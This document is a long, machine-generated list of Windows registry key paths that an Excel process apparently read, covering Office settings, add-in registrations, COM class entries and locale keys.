HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{2B0F765D-C0E9-4171-908E-08A611B84FF6}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{2B0F765D-C0E9-4171-908E-08A611B84FF6}\PropertyBag
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{2B0F765D-C0E9-4171-908E-08A611B84FF6}\PropertyBag
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Cookies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\CTF
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\CTF\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\CTF\EnableAnchorContext
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\CTF\EnableAnchorContext
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Internet\NetworkStatusCache
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\MOTIF\FlexUIAutomation
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\DiagnosticMode
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Common\TeachingCallouts
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\TeachingCallouts
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\TeachingCallouts\AlwaysShowTeachingCallouts
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\TeachingCallouts\DontShowTeachingCallouts
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\TeachingCallouts\TellMeTeachingCalloutWXP
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Common\PowerUI\Stats\Microsoft.Excel.Workbook
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\PowerUI\Stats\Microsoft.Excel.Workbook
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\OverridePointerMode
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.UI.ViewManagement.UIViewSettings
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.UI.ViewManagement.UIViewSettings
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.UI.ViewManagement.UIViewSettings\ActivationType
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.UI.ViewManagement.UIViewSettings\Server
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.UI.ViewManagement.UIViewSettings\DllPath
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.UI.ViewManagement.UIViewSettings\Threading
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.UI.ViewManagement.UIViewSettings\TrustLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.UI.ViewManagement.UIViewSettings\CustomAttributes
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.UI.ViewManagement.UIViewSettings\CustomAttributes
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.UI.ViewManagement.UIViewSettings\RemoteServer
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.UI.ViewManagement.UIViewSettings\ActivateAsUser
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.UI.ViewManagement.UIViewSettings\ActivateInSharedBroker
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.UI.ViewManagement.UIViewSettings\ActivateInBrokerForMediumILContainer
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.UI.ViewManagement.UIViewSettings\Permissions
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.UI.ViewManagement.UIViewSettings\ActivateOnHostFlags
HKEY_CURRENT_USER\Software\Classes\CLSID\{2E1271D5-2FF2-4EA4-9647-C67A82A2D85C}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{2E1271D5-2FF2-4EA4-9647-C67A82A2D85C}
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{2E1271D5-2FF2-4EA4-9647-C67A82A2D85C}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{2E1271D5-2FF2-4EA4-9647-C67A82A2D85C}\TreatAs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{2E1271D5-2FF2-4EA4-9647-C67A82A2D85C}\TreatAs
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{2E1271D5-2FF2-4EA4-9647-C67A82A2D85C}\TreatAs
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{2E1271D5-2FF2-4EA4-9647-C67A82A2D85C}
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{2E1271D5-2FF2-4EA4-9647-C67A82A2D85C}\ActivateOnHostFlags
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{2E1271D5-2FF2-4EA4-9647-C67A82A2D85C}\(Default)
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{2E1271D5-2FF2-4EA4-9647-C67A82A2D85C}\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{2E1271D5-2FF2-4EA4-9647-C67A82A2D85C}\InprocServer32
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{2E1271D5-2FF2-4EA4-9647-C67A82A2D85C}\InprocServer32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{2E1271D5-2FF2-4EA4-9647-C67A82A2D85C}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{2E1271D5-2FF2-4EA4-9647-C67A82A2D85C}\InprocServer32\ThreadingModel
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{2E1271D5-2FF2-4EA4-9647-C67A82A2D85C}\InprocHandler32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{2E1271D5-2FF2-4EA4-9647-C67A82A2D85C}\InprocHandler32
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{2E1271D5-2FF2-4EA4-9647-C67A82A2D85C}\InprocHandler32
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{2E1271D5-2FF2-4EA4-9647-C67A82A2D85C}\InprocHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{2E1271D5-2FF2-4EA4-9647-C67A82A2D85C}\InprocHandler
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{2E1271D5-2FF2-4EA4-9647-C67A82A2D85C}\InprocHandler
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{2E1271D5-2FF2-4EA4-9647-C67A82A2D85C}\LocalServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{2E1271D5-2FF2-4EA4-9647-C67A82A2D85C}\LocalServer32
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{2E1271D5-2FF2-4EA4-9647-C67A82A2D85C}\LocalServer32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{2E1271D5-2FF2-4EA4-9647-C67A82A2D85C}\AppID
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{2E1271D5-2FF2-4EA4-9647-C67A82A2D85C}\LocalServer
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{2E1271D5-2FF2-4EA4-9647-C67A82A2D85C}\LocalServer
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{2E1271D5-2FF2-4EA4-9647-C67A82A2D85C}\LocalServer
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{2E1271D5-2FF2-4EA4-9647-C67A82A2D85C}\Elevation
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{2E1271D5-2FF2-4EA4-9647-C67A82A2D85C}\Elevation
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{2E1271D5-2FF2-4EA4-9647-C67A82A2D85C}\Elevation
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{2E1271D5-2FF2-4EA4-9647-C67A82A2D85C}\LocalServer32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{2E1271D5-2FF2-4EA4-9647-C67A82A2D85C}\LocalServer
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{2E1271D5-2FF2-4EA4-9647-C67A82A2D85C}\InProcServer32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{2E1271D5-2FF2-4EA4-9647-C67A82A2D85C}\InProcServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{2E1271D5-2FF2-4EA4-9647-C67A82A2D85C}\InProcHandler32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{2E1271D5-2FF2-4EA4-9647-C67A82A2D85C}\InProcHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\UseHVSocket
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\ProviderId
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel\FlightCacheProviderId
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\ClickToRun\Inventory\Office\16.0
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\Common\ResetTabletModeOverride
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\PointerModeInitVersion
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\TurnOffPhotograph
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\DeveloperTools
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Common\Signals\Stats\Anonymous\Microsoft.Excel.Workbook
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Signals\Stats\Anonymous\Microsoft.Excel.Workbook
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Signals\Stats\Anonymous\Microsoft.Excel.Workbook\ClicksData
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Common\Feedback
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\UseMockCollabCoordinator
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\HideBuiltInTableStyles
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\HideBuiltInStyles
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\RoamingLastSyncTimeExcel
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ar-SA
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ar-SA
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\he-IL
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\he-IL
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ur-PK
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ur-PK
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\fa-IR
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\fa-IR
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\sd-Deva-IN
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\sd-Deva-IN
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Fonts\EnableApplicationFonts
HKEY_CURRENT_USER\EUDC\1252
HKEY_CURRENT_USER\EUDC
HKEY_CURRENT_USER\Software\Microsoft\Avalon.Graphics
HKEY_CURRENT_USER\Software\Microsoft\Avalon.Graphics\DISPLAY1
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\NOFPU
HKEY_LOCAL_MACHINE\Hardware\Description\System\FloatingPointProcessor
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\Randomize
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\WK? Settings
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Excel\Line Print
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Line Print
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\EnableAltOOMError
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\General\AddIns
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\Excel\Addins
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\Excel\Addins\ExcelPlugInShell.PowerMapConnect
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\Excel\Addins\ExcelPlugInShell.PowerMapConnect\LoadBehavior
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\Excel\Addins\ExcelPlugInShell.PowerMapConnect\FriendlyName
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\Excel\Addins\ExcelPlugInShell.PowerMapConnect\RequireShutdownNotification
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\Excel\Addins\ExcelPlugInShell.PowerMapConnect\Manifest
HKEY_CURRENT_USER\Software\Classes\ExcelPlugInShell.PowerMapConnect\Clsid
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\ExcelPlugInShell.PowerMapConnect\Clsid
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\ExcelPlugInShell.PowerMapConnect\CLSID\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\ExcelPlugInShell.PowerMapConnect\Clsid
HKEY_LOCAL_MACHINE\Software\Classes\ExcelPlugInShell.PowerMapConnect\Clsid\(Default)
HKEY_CLASSES_ROOT\CLSID\{F39D01F3-69C1-45E1-93B2-7BF0BC6EB63E}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{F39D01F3-69C1-45E1-93B2-7BF0BC6EB63E}\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{F39D01F3-69C1-45E1-93B2-7BF0BC6EB63E}\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{F39D01F3-69C1-45E1-93B2-7BF0BC6EB63E}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{F39D01F3-69C1-45E1-93B2-7BF0BC6EB63E}\InprocServer32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{F39D01F3-69C1-45E1-93B2-7BF0BC6EB63E}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\Excel\Addins\ExcelPlugInShell.PowerMapConnect\Description
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\Excel\Addins\ExcelPlugInShell.PowerMapConnect\OverrideDefaultDisable
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\Excel\Addins\NativeShim.InquireConnector.1
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\Excel\Addins\NativeShim.InquireConnector.1\LoadBehavior
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\Excel\Addins\NativeShim.InquireConnector.1\FriendlyName
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\Excel\Addins\NativeShim.InquireConnector.1\RequireShutdownNotification
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\Excel\Addins\NativeShim.InquireConnector.1\Manifest
HKEY_CURRENT_USER\Software\Classes\NativeShim.InquireConnector.1\Clsid
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\NativeShim.InquireConnector.1\Clsid
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\NativeShim.InquireConnector.1\CLSID\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\NativeShim.InquireConnector.1\Clsid
HKEY_LOCAL_MACHINE\Software\Classes\NativeShim.InquireConnector.1\Clsid\(Default)
HKEY_CLASSES_ROOT\CLSID\{237428F1-F2C7-4F86-B7ED-ADE148ACF95F}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{237428F1-F2C7-4F86-B7ED-ADE148ACF95F}\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{237428F1-F2C7-4F86-B7ED-ADE148ACF95F}\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{237428F1-F2C7-4F86-B7ED-ADE148ACF95F}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{237428F1-F2C7-4F86-B7ED-ADE148ACF95F}\InprocServer32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{237428F1-F2C7-4F86-B7ED-ADE148ACF95F}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\Excel\Addins\NativeShim.InquireConnector.1\Description
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\Excel\Addins\NativeShim.InquireConnector.1\OverrideDefaultDisable
HKEY_CURRENT_USER\Software\Microsoft\Office\Excel\Addins
HKEY_CURRENT_USER\Software\Microsoft\Office\Excel\Addins\AdHocReportingExcelClientLib.AdHocReportingExcelClientAddIn.1
HKEY_CURRENT_USER\Software\Microsoft\Office\Excel\Addins\AdHocReportingExcelClientLib.AdHocReportingExcelClientAddIn.1\LoadBehavior
HKEY_CURRENT_USER\Software\Microsoft\Office\Excel\Addins\AdHocReportingExcelClientLib.AdHocReportingExcelClientAddIn.1\FriendlyName
HKEY_CURRENT_USER\Software\Microsoft\Office\Excel\Addins\AdHocReportingExcelClientLib.AdHocReportingExcelClientAddIn.1\RequireShutdownNotification
HKEY_CURRENT_USER\Software\Microsoft\Office\Excel\Addins\AdHocReportingExcelClientLib.AdHocReportingExcelClientAddIn.1\Manifest
HKEY_CURRENT_USER\Software\Classes\AdHocReportingExcelClientLib.AdHocReportingExcelClientAddIn.1\Clsid
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\AdHocReportingExcelClientLib.AdHocReportingExcelClientAddIn.1\Clsid
HKEY_CLASSES_ROOT\CLSID\{509E7382-B849-49A4-8A3F-BEAB7E7D904C}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{509E7382-B849-49A4-8A3F-BEAB7E7D904C}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{509E7382-B849-49A4-8A3F-BEAB7E7D904C}\InprocServer32
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{509E7382-B849-49A4-8A3F-BEAB7E7D904C}\InprocServer32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{509E7382-B849-49A4-8A3F-BEAB7E7D904C}\InprocServer32\(Default)
HKEY_CURRENT_USER\Software\Microsoft\Office\Excel\Addins\AdHocReportingExcelClientLib.AdHocReportingExcelClientAddIn.1\Description
HKEY_CURRENT_USER\Software\Microsoft\Office\Excel\Addins\AdHocReportingExcelClientLib.AdHocReportingExcelClientAddIn.1\OverrideDefaultDisable
HKEY_CURRENT_USER\Software\Microsoft\Office\Excel\Addins\PowerPivotExcelClientAddIn.NativeEntry.1
HKEY_CURRENT_USER\Software\Microsoft\Office\Excel\Addins\PowerPivotExcelClientAddIn.NativeEntry.1\LoadBehavior
HKEY_CURRENT_USER\Software\Microsoft\Office\Excel\Addins\PowerPivotExcelClientAddIn.NativeEntry.1\FriendlyName
HKEY_CURRENT_USER\Software\Microsoft\Office\Excel\Addins\PowerPivotExcelClientAddIn.NativeEntry.1\RequireShutdownNotification
HKEY_CURRENT_USER\Software\Microsoft\Office\Excel\Addins\PowerPivotExcelClientAddIn.NativeEntry.1\Manifest
HKEY_CURRENT_USER\Software\Classes\PowerPivotExcelClientAddIn.NativeEntry.1\Clsid
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\PowerPivotExcelClientAddIn.NativeEntry.1\Clsid
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\PowerPivotExcelClientAddIn.NativeEntry.1\CLSID\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\PowerPivotExcelClientAddIn.NativeEntry.1\Clsid
HKEY_LOCAL_MACHINE\Software\Classes\PowerPivotExcelClientAddIn.NativeEntry.1\Clsid\(Default)
HKEY_CLASSES_ROOT\CLSID\{A2DBA3BE-42CC-4D0E-95FD-BCAA051BA798}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{A2DBA3BE-42CC-4D0E-95FD-BCAA051BA798}\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{A2DBA3BE-42CC-4D0E-95FD-BCAA051BA798}\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{A2DBA3BE-42CC-4D0E-95FD-BCAA051BA798}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{A2DBA3BE-42CC-4D0E-95FD-BCAA051BA798}\InprocServer32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{A2DBA3BE-42CC-4D0E-95FD-BCAA051BA798}\InprocServer32\(Default)
HKEY_CURRENT_USER\Software\Microsoft\Office\Excel\Addins\PowerPivotExcelClientAddIn.NativeEntry.1\Description
HKEY_CURRENT_USER\Software\Microsoft\Office\Excel\Addins\PowerPivotExcelClientAddIn.NativeEntry.1\OverrideDefaultDisable
HKEY_CLASSES_ROOT\Excel.Chart.8\protocol\StdFileEditing\server
HKEY_CLASSES_ROOT\CLSID\{00024500-0000-0000-C000-000000000046}\LocalServer32
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00024500-0000-0000-C000-000000000046}\LocalServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{00024500-0000-0000-C000-000000000046}\LocalServer32\(Default)
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\OPEN
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\DefaultPath
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\OpenDir
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\EnableAnimations
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\General\Xlstart
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\AltStartup
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\CoauthDebugMode
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\Common\UserInfo
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\UserInfo
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\QFE_17407
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\FirstRun
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\WEF\TrustedCatalogs
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\WEF\TrustedCatalogs
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\WEF\TrustedCatalogs\AllowUserDefinedFileShareCatalogs
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\WEF
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\WEF\Excel_RequireForceRefreshAtBoot
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\WEF
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\WEF\Excel_RibbonCache
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\WEF\ExcelOMEXRefreshPending
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\WEF\Excel_AggregatedCache
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\PowerPivot\Settings
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\PowerPivot\Settings
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office Test\Special
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\DisableCoauthLegacyVersionMitigation
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\XLDesktopCoauthActive
HKEY_CURRENT_USER\Software\Classes\CLSID\{00020820-0000-0000-C000-000000000046}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{00020820-0000-0000-C000-000000000046}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{00020820-0000-0000-C000-000000000046}\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{00020820-0000-0000-C000-000000000046}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00020820-0000-0000-C000-000000000046}\TreatAs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{00020820-0000-0000-C000-000000000046}\TreatAs
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{00020820-0000-0000-C000-000000000046}\TreatAs
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00020820-0000-0000-C000-000000000046}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{00020820-0000-0000-C000-000000000046}\ActivateOnHostFlags
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{00020820-0000-0000-C000-000000000046}\ActivateOnHostFlags
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00020820-0000-0000-C000-000000000046}\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{00020820-0000-0000-C000-000000000046}\InprocServer32
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{00020820-0000-0000-C000-000000000046}\InprocServer32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{00020820-0000-0000-C000-000000000046}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{00020820-0000-0000-C000-000000000046}\InprocServer32\ThreadingModel
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00020820-0000-0000-C000-000000000046}\InprocHandler32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{00020820-0000-0000-C000-000000000046}\InprocHandler32
